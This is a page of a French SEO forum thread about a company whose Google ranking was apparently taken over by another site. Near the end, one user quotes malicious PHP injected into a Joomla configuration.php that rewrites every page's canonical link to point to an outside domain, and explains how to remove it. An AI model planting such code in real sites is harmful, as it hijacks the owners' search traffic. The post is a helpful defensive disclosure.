Un site américain à pris "ma place" sur Google
40 messages
• Page 3 sur 3 • 1, 2, 3
Consultez la formation au REFERENCEMENT naturel Google de WebRankInfo / Ranking Metrics
-

pinrolland - WRInaute impliqué

Re: Un site américain à pris "ma place" sur Google
ça a sans doute rien à voir ,
mais quand vous "angliciser" vos noms de société (genre side & communication à perpignan
)c'est pour attirer du contact anglosaxon ?? c'est pas l'inverse qui se produit ??
mais quand vous "angliciser" vos noms de société (genre side & communication à perpignan
- franckM
- WRInaute impliqué

Dolph a écrit:Ok, je me suis gouré dans ton ndd, mais ça n'empêche que ton screen montre que tu étais connecté ou que tu n'avais pas nettoyer ton cache.
Ce qui de toute façon, fausse les résultats.
Salut,
Où vois tu ça dans les résultats du moteur sur le screen ?
-

sidecom - Nouveau WRInaute

Dolph a écrit:Ok, je me suis gouré dans ton ndd, mais ça n'empêche que ton screen montre que tu étais connecté ou que tu n'avais pas nettoyer ton cache.
Ce qui de toute façon, fausse les résultats.
Si mon objectif était de montrer mon positionnement réel sur Google, peut être que je me serais déconnecté et que j'aurais nettoyer mon cache mais ce n'était pas le but.
-

sidecom - Nouveau WRInaute

pinrolland a écrit:ça a sans doute rien à voir ,
mais quand vous "angliciser" vos noms de société (genre side & communication à perpignan)c'est pour attirer du contact anglosaxon ?? c'est pas l'inverse qui se produit ??
En effet, ça a sans doute rien à voir
Ce n'est pas moi qui est choisis ce nom donc je ne pourrais pas vous expliquer le pourquoi du comment.
-

lunicrea - WRInaute impliqué

Désolé de m'auto-quote, juste pour savoir si je me goure complètement .lunicrea a écrit:Salut.
Heu, je vois dans les SERPs sur l'expression "side communication" 1 chose qui m'a troublé : Un site qui se nomme -www.sidecom.fr et un autre site -www.sidecommunication.fr.
J'ai bien vu que ces 2 sites sont de la même société (la tienne en l'occurence) mais est-ce réellement une bonne idée de créer un site "portail" avec comme contenu des phrases à mots clés (-www.sidecom.fr) pointant vers l'url -www.sidecommunication.fr ?
De mon point de vue, c'est prendre 2 places dans les SERPs dont une qui est inutile car je pense que Google sait que le site "portail" n'est pas pertinent.
Enfin, ce n'est que mon avis ...
J'ai vu personne réagir donc je me dis que c'est peut-être une ânerie ce que j'ai dis
- franckM
- WRInaute impliqué

Dolph a écrit:franckM a écrit:Où vois tu ça dans les résultats du moteur sur le screen ?
Recherche local sur Perpignan, par exemple.
Lieu détecté automatiquement
Afin de vous proposer les résultats de recherche les plus pertinents possible, Google essaye de détecter automatiquement votre situation géographique et de personnaliser vos résultats en fonction de celui-ci. Un "lieu détecté automatiquement" est déterminé en fonction des facteurs suivants :
votre adresse IP ;
la fonctionnalité Ma position de la barre d'outils Google. Si vous avez installé la barre d'outils Google et activé la fonctionnalité Ma position , vos résultats de recherche seront personnalisés en fonction de votre lieu approximatif (s'il est détecté). Si vous ne souhaitez pas que la barre d'outils Google tente de déterminer votre lieu approximatif, vous pouvez désactiver la fonctionnalité Ma position
Source:
http://www.google.fr/support/websearch/bin/answer.py?answer=179386&hl=fr
Vides le cache, déloggue toi et tu verras que le résultat géographique est encore présent...
- Gui_
- Nouveau WRInaute

Salut,
J'ai le même problème.
Regarde dans le code source de ta page, dans <head></head> et regarde s'il n'y a pas une url canonique bizarre.
J'ai trouvé un truc bizarre dans la config php -> configuration.php, dans le genre :
Disponible ici aussi (pas exactement le même -> http://pastebin.com/8n9JqJXD)
Vu la date, c'est très récent.
Supprime ça de ton fichier de config.
Maintenant faut savoir commment ce morceau de code s'est retrouvé et boucher la faille qui a permis ceci.
Ca m'est arrivé sur un site joomla aussi, mais en version 1.5.22
Voila, en espérant avoir pu aider
J'ai le même problème.
Regarde dans le code source de ta page, dans <head></head> et regarde s'il n'y a pas une url canonique bizarre.
J'ai trouvé un truc bizarre dans la config php -> configuration.php, dans le genre :
- Code: Tout sélectionner
function callback($buffer){return (str_replace("</head>", " <link rel=\"canonical\" href=\"http://crotopole.eu/".substr(md5($_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']), 0, 10)."\" />\n</head>", $buffer));}
ob_start("callback");
Disponible ici aussi (pas exactement le même -> http://pastebin.com/8n9JqJXD)
Vu la date, c'est très récent.
Supprime ça de ton fichier de config.
Maintenant faut savoir commment ce morceau de code s'est retrouvé et boucher la faille qui a permis ceci.
Ca m'est arrivé sur un site joomla aussi, mais en version 1.5.22
Voila, en espérant avoir pu aider
40 messages
• Page 3 sur 3 • 1, 2, 3
Formation recommandée sur ce thème :
Formation REFERENCEMENT naturel Google : apprenez une méthode efficace pour optimiser à fond le référencement naturel dans Google de façon durable... Formation animée par Olivier Duffez et Fabien Facériès, experts en référencement naturel.
Tous les détails sur le site Ranking Metrics : programme, prix, dates et lieux, inscription en ligne.
Lectures recommandées sur ce thème :
- rel="author" pris en compte par google depuis peu
- le symbole "+" n'est pas pris en compte par Google
- Les "blogspot.fr" sont-ils pris en compte par Google analytics ?
- L'attribut "title" des liens est-il pris en compte
- [TEST] "Nouveaux" facteurs pris en compte par Goog
- Clic sur le bouton "J'aime" pas pris en compte (bug compteur)
- <!--#include file="source.htm" --> pris en c
- La nouvelle politique de confidentialité de Google critiquée par le Congrès américain
- noms de domaine non pris mais pris !
- "Google Photos" et "Google Blogs" remplaceraient Picasa et Blogger
- Analyse de popularité
Cet outil vous permet d'analyser en détails la "popularité" de votre site sur Google. En plus du nombre de liens pris en compte par Google, il calcule le pourcentage de liens internes parmi tous les liens, et il affiche les premières URL trouvées. - Liste de mots-clés
Cet outil vous permet de créer à partir de quelques mots-clés une liste d'expressions constituées des mots pris dans tous les ordres possibles. Il sert aux analyses de positionnement et achats de mots-clés.